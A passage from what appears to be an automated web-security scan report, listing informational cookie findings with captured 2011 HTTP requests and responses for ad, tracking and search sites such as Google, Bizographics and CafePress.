Set-Cookie: causes_82bf7f7=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%0ASGFzaHsABjoKQHVzZWR7AA%3D%3D--09f1df2430e49c9b041159dbda4315158b7d3e82; path=/
Status: 304 Not Modified
ETag: "1bd08653d0a1b1a55f5092e836fe017e"
X-Runtime: 0.00236
Content-Type: text/html; charset=utf-8
Content-Length: 0
Server: Mongrel 1.0.1
Cache-Control: private, max-age=0, must-revalidate


7.527. http://wstat.wibiya.com/l.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wstat.wibiya.com
Path:   /l.jpg

Request

GET /l.jpg?t=488383&r=http://www.companypond.com/atlanticays HTTP/1.1
Host: wstat.wibiya.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticyachtandship.com/about_us.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian)
Set-Cookie: Apache=173.193.214.243.1298825538524421; path=/; expires=Wed, 22-Feb-12 16:52:18 GMT
Last-Modified: Sun, 05 Dec 2010 12:09:17 GMT
Accept-Ranges: bytes
Content-Length: 0
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Connection: close
Content-Type: image/jpeg


7.528. http://www.adexchanger.com/email/liveintent/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adexchanger.com
Path:   /email/liveintent/

Request

GET /email/liveintent/ HTTP/1.1
Host: www.adexchanger.com
Proxy-Connection: keep-alive
Referer: http://liveintent.com/company.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/html; charset=UTF-8
Date: Tue, 01 Mar 2011 13:21:49 GMT
X-Pingback: http://www.adexchanger.com/xmlrpc.php
Link: <http://www.adexchanger.com/?p=33088>; rel=shortlink
Connection: Keep-Alive
Set-Cookie: X-Mapping-hmcbjmko=ED8B94862C14E743B745BD817E3B3B7D; path=/
Content-Length: 44298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

7.529. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adfusion.com
Path:   /Adfusion.PartnerSite/categoryhtml.aspx

Request

GET /Adfusion.PartnerSite/categoryhtml.aspx?userfeedguid=7eaf0669-773a-4c62-aed6-753c78a727c3&clickTag=http://r1-ads.ace.advertising.com/click/site=0000743260/mnum=0000883736/cstr=73260642=_4d6a8d99,6404615688,743260^883736^1183^0,1_/xsxdata=1:93182371/bnum=73260642/optn=64?trg= HTTP/1.1
Host: www.adfusion.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AF=CID=a426abb1-d2c9-4abc-ae78-663e824d759b

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:58 GMT
Server: Microsoft-IIS/6.0
P3P: P3P - policyref="http://www.adfusion.com/w3c/adfusion.xml", CP="NON DSP COR CURa TIA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: AF=CID=a426abb1-d2c9-4abc-ae78-663e824d759b; expires=Sat, 27-Aug-2011 16:44:58 GMT; path=/
Cache-Control: no-cache
Cache-Control: private
Cache-Control: no-store
Cache-Control: must-revalidate
Cache-Control: max-stale=0
Cache-Control: post-check=0
Cache-Control: pre-check=0
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4271

<div id="theme300x250A03H0F1L1P0000V2_3Container"> <style type="text/css" media="screen"> @import url(http://aranet.vo.llnwd.net/o28/themes/css/theme300x250A03H0F1L1P0000V2_3.css);
...[SNIP]...

7.530. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Request

GET /collect/?pid=790&url=http%3A%2F%2Fwww.project-syndicate.org%2F&pageUrl=http%3A%2F%2Fwww.project-syndicate.org%2F&time=1298773080966 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.project-syndicate.org/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; BizoData=4vViibkwa11AROOyc9KHtZNQb1MaQBj6W1Pcisad54kZd2VrCIGNp5RdHGLm7YsbqNRZwyVXEG6DIpUIfyKILYmKHI1ABSLZvLgDunbE6nvquxBmb0D45iic3c1CtipWe7eL2Qw52djlUKyxBmb0D45iicyrAWx24Ux4V2FP8cTmwANONupnpcGwYfPATgLCJvnzT4RPryXA1ax80hRd8BQsdl5aKeenwN6x6W8H95eYqt4fDg3TBfWjrtiivVcIOElY32haGkFuCOCd8kisMlaH0zqGS8GvQ96Pv9Wdl4zfJRRGEHCIMkdZf9cipj8l3ZY0x538gj3RipxoWlipmMVXiiHcaWcBzdhe5QAWPecIIMQJzBGYJn7o4sHezgWIS55qqGW7JzVxay7vXnx5Tpuis8w77hW2bjFYA669pnlhSii48NipADZiidrfMyxSuQgpIuasv1AlVX1AWwNKoOnEiiYateipx4n7q1jZzpXOcC5xwcsOceLYL7xBjDll1FhipvisKPp0SSHGlQvIIMQJzBGYJkoipGyHXaRBv035D86zr0iph5w7S6MV6tJ4Zp9b0yNvS5g08VF2CUNii4KMGpZm1OFaFKLjw34ANmJ2t8zLFK5CCkii5qyisUCVVfWQZpwHKgGPJxq177HiifurWFhDTxvNNkisMgUisBpRyxyj9r4PdG0LPhR7qVakHis6aisXPxI3GmgipEVxNzkbNbTXusFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTBysA6islHzqC9hpt5jPHS0gfQrCMsdiilfgSlfMaUBlo33JYUyUeA6LZCqz2sUCoz0Z4yMOr3ISuisTkQllkCqI09LcziplMN7DjmeRlE5k9TOFLeZzxcHjVQXipisbIIsrHEtIncmuw4ipmurAAqx4pTJCwJiiQNfVvssga1; BizoNetworkPartnerIndex=4

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Language: en-US
Content-Type: text/javascript;charset=UTF-8
Date: Sun, 27 Feb 2011 02:18:15 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=a1177894-f476-4957-80ae-6dca795c7582; Domain=.bizographics.com; Expires=Sun, 28-Aug-2011 14:18:15 GMT; Path=/
Set-Cookie: BizoData=ts31Zu27MS2wEk8pES6Du9Qb1MaQBj6W1Pcisad54kZd2VrCIGNp5RdHGLm7YsbqNRZwyVXEG6DIpUIfyKILYmKHI1ABSLZvLgDunbE6nvquxBmb0D45iic3c1CtipWe7eL2Qw52djlUKyxBmb0D45iicyrAWx24Ux4V2FP8cTmwANONupnpcGwYfPATgLCJvnzT4RPryXA1ax80hRd8BQsdl5aKeenwN6x6W8H95eYqt4fDg3TBfWjrtiivVcIOElY32haGkFuCOCd8kisMlaH0zqGS8GvQ96Pv9Wdl4zfJRRGEHCIMkdZf9cipj8l3ZY0x538gj3RipxoWlipmMVXiiHcaWcBzdhe5QAWPecIIMQJzBGYJn7o4sHezgWIS55qqGW7JzVxay7vXnx5Tpuis8w77hW2bjFYA669pnlhSii48NipADZiidrfMyxSuQgpEFis27mfTKBaAWwNKoOnEiiYateipx4n7q1hNxTUv7V0R4csOceLYL7xCpS2siiu3pAiihCoPIGlN7GO8tJ8bQ1OCBD8HisSkIBagBh5xlR27HxK3m9Da6XiirwxBAB0ZFDipA0aleYkLyGipuiicoxOXJii2rplrpQCQEipwV9h67ETqsE1eipWwwnuFtpqEzAZFN87RBuXHehoD7phfTriiOEhN8UMj4XZdpd4cxDdHzRTy2hfmviiCipMYwOFV6Wsis6zLpZBD9ip3GpzFRqiidRo2dXQ06xWWgwYvO8jmWc9UzGfccMWY4JCgI6UbOgtTlGWgrkHb2iiJ7HeWfeGJhipkI3X1gYWgt9k4kR7p23Khz5qEL9EwRipv8dWmQlNdH9CCvy4aMOLfLVy0KRksJdJjg51dyLvwBYDXGbG2QtsSmtffipvq6lneLoYFVX1yYwMlSLgl5GUTmT1M4Ut5nPFweNVBfoW8LZCUt4bW0E5eyNYkZTpFClIzlY1MxzBqEyAgf2VzPjVjYUaBJtqo0WWs2TtsUcJRQW9nslcjn6x4lPJOxYOGUh7ZFIObNZ6NfU7cbg59GMg13N2GMr42emSOGaJpY; Domain=.bizographics.com; Expires=Sun, 28-Aug-2011 14:18:15 GMT; Path=/
Set-Cookie: BizoNetworkPartnerIndex=8; Domain=.bizographics.com; Expires=Tue, 01-Mar-2011 00:00:00 GMT; Path=/
Content-Length: 369
Connection: keep-alive

_bizo_set_session_cookie("_bizo_bzid","a1177894-f476-4957-80ae-6dca795c7582",1);_bizo_fire_rm("T8P","D8N","Q3K","C9Q");_bizo_set_session_cookie("_bizo_cksm","AC1D22CE7AF9EE3E",1);_bizo_fire_partners([
...[SNIP]...

7.531. http://www.blogger.com/reviews/json/aggregates  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.blogger.com
Path:   /reviews/json/aggregates

Request

POST /reviews/json/aggregates HTTP/1.1
Host: www.blogger.com
Proxy-Connection: keep-alive
Referer: http://www.blogger.com/blog-post-reactions.g?options=%5Bfunny%2C+interesting%2C+cool%5D&textColor=%23666666
Origin: http://www.blogger.com
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: blogger_TID=9d47c277fe69a857
Content-Length: 252

req={"entities":[{"url": "http%3A%2F%2Fwww.cloudscan.me%2F2010%2F09%2Fsmarter-mail-7x-713876-file-fuzzing.html","groups":["reactions"]},{"url": "http%3A%2F%2Fwww.cloudscan.me%2F2010%2F09%2Fsmarter-mai
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 01 Mar 2011 01:52:58 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: PREF=ID=c1372ea376d59a37:TM=1298944378:LM=1298944378:S=QpEYH5_X375-4ban; expires=Thu, 28-Feb-2013 01:52:58 GMT; path=/; domain=www.blogger.com
Set-Cookie: NID=44=affXbr4q_o0HOLQDn9c65QeWFsJPbKUx7-Z0hiCpHI7OcfWBI95hxSZc9ZH1OMsW2ed5fSdgY3GJHRAoDyx4v4o7LB6WZTUMYucv6UukQN_JP3AlvKkn3dU0IeuZccWu; expires=Wed, 31-Aug-2011 01:52:58 GMT; path=/; domain=.blogger.com; HttpOnly
X-Content-Type-Options: nosniff
Server: zfe
X-XSS-Protection: 1; mode=block
Content-Length: 457

{"channelHeader":{"token":"AIe9_BEjPXf8VLiHIpwcj0QF1ALaDtuWxgSczTbpadiEaQEefXVDlGE-I_esBq3vzQYXb-cbRk7iZVXS6Cl0HNawnhUgw_ggvul_uRbBqB-H4flG6HYnYw_CppZCwQnQX4eD_m32gUznaPM9_iOdpBTBDPXRTFPwnw"},"user":{
...[SNIP]...

7.532. http://www.cafepress.com/duckduckgo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /duckduckgo

Request

GET /duckduckgo HTTP/1.1
Host: www.cafepress.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/faq.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW18
ntCoent-Length: 41195
Vary: Accept-Encoding
Date: Sun, 27 Feb 2011 23:42:10 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=yukwhc55nqkjhe55cavfqmmi; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=8ffd924c-ac46-4d67-a746-a756a45ebe93; domain=cafepress.com; expires=Fri, 27-Feb-2111 23:42:10 GMT; path=/
Set-Cookie: cpv=7cd24b2a-54c5-4b3e-a48e-59a16bd68fb7; domain=cafepress.com; expires=Fri, 27-Feb-2111 23:42:10 GMT; path=/
Set-Cookie: tfx_ltch=7%2cduckduckgo.com%2c20110227154210%2c; domain=cafepress.com; expires=Mon, 28-Feb-2011 23:42:10 GMT; path=/
Set-Cookie: tfx_touch=7%2cduckduckgo.com%2c20110227154210%2c; domain=cafepress.com; expires=Sat, 22-Feb-2031 23:42:10 GMT; path=/
Set-Cookie: cppid=1999; domain=cafepress.com; expires=Sun, 06-Mar-2011 23:42:10 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 06-Mar-2011 23:42:10 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 06-Mar-2011 23:42:10 GMT; path=/
Set-Cookie: pid.guid=b4fe9865-eee3-4926-89ec-9fe3ef86c27e; domain=cafepress.com; expires=Wed, 24-Feb-2021 23:42:10 GMT; path=/
Set-Cookie: cp-v=216508906B470ADCE1723F300108488D; domain=cafepress.com; expires=Sat, 27-Feb-2021 23:42:10 GMT; path=/
Set-Cookie: cppss=0x1; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 41195


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:fb="http://www.facebook
...[SNIP]...

7.533. http://www.companypond.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.companypond.com
Path:   /

Request

GET / HTTP/1.1
Host: www.companypond.com
Proxy-Connection: keep-alive
Referer: http://adam.companypond.com/peeps.php?email=4240be8e2dc90b4aef080848af60435f&bio=no
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:51:59 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: symfony=ebca41751bd59796dfd688fdfd9cc899; path=/
X-Ua-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 70465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...

7.534. http://www.freefind.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefind.com
Path:   /

Request

GET / HTTP/1.1
Host: www.freefind.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Expires: Wed, 01 Dec 2010 02:01:48 GMT
Pragma: no-cache
Cache-Control: no-cache="set-cookie"
Server: FreeFind/8.2
Set-Cookie: ref=6E6F207265666572657220736574; Domain=.freefind.com; Path=/; Expires=Wed, 29-Feb-2012 02:01:48 GMT
Content-Type: text/html; charset=UTF-8
Date: Tue, 01 Mar 2011 02:01:48 GMT
Content-Length: 23145

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HEAD><TITLE>Site Search Engines, Free and Pro Versions - FreeFind.com</TITLE>
<!-- FreeFind Begin no index -->
<meta http-equiv="Con
...[SNIP]...

7.535. http://www.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /

Request

GET / HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762038:GM=1:SG=1:S=jMTAb3eKhn0tk70T

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:17:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: enabled=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=www.google.com
Set-Cookie: enabled=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.www.google.com
Set-Cookie: enabled=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=google.com
Set-Cookie: enabled=; expires=Mon, 01-Jan-1990 00:00:00 GMT; path=/; domain=.google.com
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762228:GM=1:SG=1:S=5qlTNa51pfSz3OuQ; expires=Mon, 25-Feb-2013 23:17:08 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 39062

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"9IlpTaTjJcvogAexmtXrDQ",kEXPI:"17259,18167,28454,28662,28
...[SNIP]...

7.536. http://www.google.com/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /aclk

Request

GET /aclk?sa=l&ai=CLJkPAoppTdPRGse3gwfF05BSn6Gg3AHP2djiE4WiywcIABABKANQq-2PtgRgyYajh9SjgBCgAav9nPADyAEBqgQXT9BAMAnRq5ED1ZfA8sCW5I9l34Gn0N66BRMInIjusPqmpwIVDiLgCh0mGWGpygUA&ei=AoppTZz_GY7EgAemsoTLCg&sig=AGiWqty2v3SSw-LS3j40TmdSG_C6qi-GvQ&adurl=http://webcontent.alterian.com/%3Fc%3Dadwords%26l%3Dppc%26k%3Dcontent%2520management%2520system HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762245:GM=1:SG=1:S=9ilIrKvsRsv6kFn7

Response

HTTP/1.1 302 Found
Cache-Control: private
Location: http://www.googleadservices.com/pagead/aclk?sa=L&ai=CLJkPAoppTdPRGse3gwfF05BSn6Gg3AHP2djiE4WiywcIABABKANQq-2PtgRgyYajh9SjgBCgAav9nPADyAEBqgQXT9BAMAnRq5ED1ZfA8sCW5I9l34Gn0N66BRMInIjusPqmpwIVDiLgCh0mGWGpygUA&ei=AoppTZz_GY7EgAemsoTLCg&val=ChBiMTU3MmU1MmZjM2NkNGQ1EPvZ6-oEGggl17G2EmD56iABKAAw0eSLlLPr9_O8ATj42evqBEDdxqTrBA&sig=AGiWqtw7pYiUb7JHJEOsILhVuHxG9ZTmWw&adurl=http://webcontent.alterian.com/%3Fc%3Dadwords%26l%3Dppc%26k%3Dcontent%2520management%2520system
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762251:GM=1:SG=1:S=QPE1QKwnEIJ4Kzog; expires=Mon, 25-Feb-2013 23:17:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 26 Feb 2011 23:17:31 GMT
Server: AdClickServer
Content-Length: 0
X-XSS-Protection: 1; mode=block


7.537. http://www.google.com/gen_204  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /gen_204

Request

GET /gen_204?atyp=i&ct=1&cad=1&sqi=3&ei=AoppTZz_GY7EgAemsoTLCg&q=content%20management%20system&zx=1298762260510 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762228:GM=1:SG=1:S=5qlTNa51pfSz3OuQ

Response

HTTP/1.1 204 No Content
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298762245:GM=1:SG=1:S=9ilIrKvsRsv6kFn7; expires=Mon, 25-Feb-2013 23:17:25 GMT; path=/; domain=.google.com
Date: Sat, 26 Feb 2011 23:17:25 GMT
Server: gws
Content-Length: 0
X-XSS-Protection: 1; mode=block


7.538. http://www.google.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /search

Request

GET /search?sourceid=chrome&ie=UTF-8&q=page+rank HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: enabled=0; NID=44=X-QIlN36SuAju9K9Sqs0vNKg6frf-ZEF-KP1FKK-Nl9b4YeeBHvLLNCarcWymWNRRn9QNuurcYCJgmNV-w5HFCLTrtIsbeOcjPyNdXzXMRdzlLK8sXldK9-rLXcoFXwg; __utmx=173272373.; __utmxx=173272373.; S=static_files=8yY1lAZwM4I; PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298769240:GM=1:SG=1:S=8EeAu-a0IG50_dcj

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:33:55 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Set-Cookie: PREF=ID=b1572e52fc3cd4d5:U=bce7df5b3282f251:FF=4:LD=en:CR=2:TM=1297804539:LM=1298770435:GM=1:SG=1:S=vgA9WIhKZi4GT0df; expires=Tue, 26-Feb-2013 01:33:55 GMT; path=/; domain=.google.com
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 78036

<!doctype html><head><title>page rank - Google Search</title><script>window.google={kEI:"A6ppTfHxJYGClAeHle3-AQ",kEXPI:"17259,18167,20782,28454,28662,28832,28986,29013,29063",kCSI:{e:"17259,18167,2078
...[SNIP]...

7.539. http://www.googleadservices.com/pagead/aclk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/aclk

Request

GET /pagead/aclk?sa=L&ai=CcxyDAoppTdPRGse3gwfF05BS4u-pfvzaxKoWt9zfBQgAEAIoA1CE586vBmDJhqOH1KOAEKABoKHh-wPIAQGqBBxP0EA-1s2xqDtVFcM7Gznm6G6sV0zD3YYTL6HnugUTCJyI7rD6pqcCFQ4i4AodJhlhqcoFAA&ei=AoppTZz_GY7EgAemsoTLCg&val=ChBiMTU3MmU1MmZjM2NkNGQ1EPvZ6-oEGggl17G2EmD56iABKAAw0eSLlLPr9_O8ATj42evqBEDdxqTrBA&sig=AGiWqtx39exaiKSZM84iWBJRdSnX6Eg4fQ&adurl=http://www.business-software.com/top-10-web-content-management-vendors.php%3Ftrack%3D1215%26traffic%3DGoogleSearch%26keyword%3Dcontent%2520management%2520system HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Set-Cookie: Conversion=Cp8BQ2N4eURBb3BwVGRQUkdzZTNnd2ZGMDVCUzR1LXBmdnpheEtvV3Q5emZCUWdBRUFJb0ExQ0U1ODZ2Qm1ESmhxT0gxS09BRUtBQm9LSGgtd1BJQVFHcUJCeFAwRUEtMXMyeHFEdFZGY003R3pubTZHNnNWMHpEM1lZVEw2SG51Z1VUQ0p5STdyRDZwcWNDRlE0aTRBb2RKaGxocWNvRkFBEhMI0dTztfqmpwIVWWflCh1pWMIHGAEgn9fVzJ7gsepASAE; expires=Mon, 28-Mar-2011 23:17:33 GMT; path=/pagead/conversion/1064849568/
Cache-Control: private
